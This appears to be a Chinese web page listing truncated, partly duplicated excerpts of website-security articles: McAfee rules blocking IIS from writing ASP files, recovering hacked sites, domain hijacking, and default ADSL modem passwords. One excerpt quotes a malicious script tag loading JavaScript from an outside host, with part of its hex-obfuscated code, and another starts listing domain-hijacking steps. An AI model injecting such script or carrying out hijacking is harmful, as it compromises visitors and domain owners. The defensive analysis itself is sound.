今天查看MCAFEE的日志时偶然发现，可以只阻挡IIS进程创建和修改ASP文件（本文以ASP文件为例，其他程序设置方法基本相同），这样我们用其他方法（比如直接在服务器上修改、通过FTP修改……）修改ASP文件就不会受影响。这样，这个规则再拦截非法操作的同时还不影响正常使用。规则见图：这样，就在不影响正常使用的情况下断绝了黑客上传木马干坏事的可能。这个方法可以给任何人使用，也适合主机商装给自己虚拟主机的服务器，保证服务器上用户的网站安全。基本上来说，这样设置之后即使是网站有任何漏洞，网站也不会被上传木马挂上非法代码、或者网站被删除、修改。需要注意的一点：因本规则将阻止IIS进程对任何.asp文件...

您的用户网站被黑,有以下几种原因造成的： 　1.　是您的客户的网站代码有问题，存在安全漏洞造成的。 　　　如果您的服务器上大部分用户的网站都正常，只有少量用户网站被黑，那 　　　么就很可能是您少量用户网站被黑的网站代码有问题，存在安全漏洞造 　　　成的。造成这个问题是没有办法解决，也不是您的责任。 　　　分析说明：　 　　　　　1）.　大家都知道，“虚拟主机提供商”对自己的每个虚拟主机用户 　　　　　　　　都分配了FSO文件操作的权限,他们通过您分配的合法权限，可 　　　　　　　　以任意改动和上传的任何文件。如果您...

如果发现网站出现异常情况，如页面被修改、管理账号不能登录，则说明网站已经被入侵。这时就需要尽快进行处理，以防止黑客种植的网页病毒扩散。　　暂时关闭网站　　网站被黑客入侵后，最常见的情况就是被植入木马程序，为了保证浏览者的安全，必须先关闭网站，待处理完毕后再开放。关闭时可以暂时将域名转向其它地址，如建立一个网站的帖吧，或者放置一个说明页面。　　使用备份恢复　　如果网站文件被黑客破坏或删除，假如事先进行过网站数据备份的话，可以直接使用备份文件恢复。万一没有对备份进行备份，而数据又非常重要的话，建议先不要进行任何操作，立即请专门进行数据恢复的公司尝试恢复服务器硬盘中的数据。　　因为有些虚拟主机服务商...

如果发现网站出现异常情况，如页面被修改、管理账号不能登录，则说明网站已经被入侵。这时就需要尽快进行处理，以防止黑客种植的网页病毒扩散。　　暂时关闭网站　　网站被黑客入侵后，最常见的情况就是被植入木马程序，为了保证浏览者的安全，必须先关闭网站，待处理完毕后再开放。关闭时可以暂时将域名转向其它地址，如建立一个网站的帖吧，或者放置一个说明页面。　　使用备份恢复　　如果网站文件被黑客破坏或删除，假如事先进行过网站数据备份的话，可以直接使用备份文件恢复。万一没有对备份进行备份，而数据又非常重要的话，建议先不要进行任何操作，立即请专门进行数据恢复的公司尝试恢复服务器硬盘中的数据。　　因为有些虚拟主机服务商...

以下文章为星外科技版权所有,有少量用户一遇到网站被黑,就马上认为是星外平台造成的.这是一种误解. 因为如果是客户的网站代码有问题，星外的平台是无法解决的,谁也帮不了这个用户.这是因为,黑客利用用户网站的漏洞,使用合法代码来修改用户网页,造成了网页被插入代码,这种情况谁也无法防止.因为木马变种太多，很多是用合法操作的.正如您把钥匙给了别人来开您自己的门是一样的道理.例如洞网的漏洞使用的就是合法的代码入侵，这种情况是任何人都无法防止，但是平台可以保证只影响单个网站，不影响整台服务器。 您的服务器是否安全?请您从以下方面来了解: 首先,您的服务器如果严格按星外的安全指引...

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了，赶紧到服务器上查看所有文件是否带有这串js代码，搜索结果没有，而且服务器也没发现被入侵的痕迹。<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>于是只能从这段代码入手，我下载这个js开发发现是下面一段代码：[code]window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x5...

前段时间，163.net被黑，在业界搞的沸沸腾腾。其实，这不是他的错。错误在于Internic 。以下内容部分编译自  packetstorm.  163被黑的技术称为域名劫持（hijacked），技术上很简单，关键在于发一份用域名注册者email地址的确认信。。我们知  道：要进行域名变更，只需到www.networksolutions.com上进行。  比如我们要劫持163.net的，具体步骤如下：  1、打开浏览器，输入http://www.networksolutions.co...

　　随着网络的普及，网络安全也越来越被人们所重视。今天就给大家介绍一个很少为人重视的案例。希望大家提高安全意识！　　大家都应该知道，现在很多的猫都带有自动拨号功能，我们可以把帐号放在ADSL猫的拨号软件里,这样每次电脑启动的时候ADSL猫就能自动拨号,一打开电脑就能够上网了。而上面的工作都是通过下面的步骤完成的：　　一：在浏览器上输入猫的默认地址，如:http://192.168.1.1，这个时候就会弹出一个对话框,一般来说进入ADSL猫时默认帐户和密码都是root.,或者是admin,或者根本就不需要ID和密码,而问题也就出在这。为什么这么说了？　　二：大家应该知道ADSL的原理吧！当我们拨...

   随着网络的普及，网络安全也越来越被人们所重视。今天就给大家介绍一个很少为人重视的案例。希望大家提高安全意识！　　大家都应该知道，现在很多的猫都带有自动拨号功能，我们可以把帐号放在ADSL猫的拨号软件里,这样每次电脑启动的时候ADSL猫就能自动拨号,一打开电脑就能够上网了。而上面的工作都是通过下面的步骤完成的：　　一：在浏览器上输入猫的默认地址，如http://192.168.1.1 ;，这个时候就会弹出一个对话框, 一般来说进入ADSL猫时默认帐户和密码都是root.,或者是admin,或者根本就不需要ID和密码,而问题也就出在这。为什么...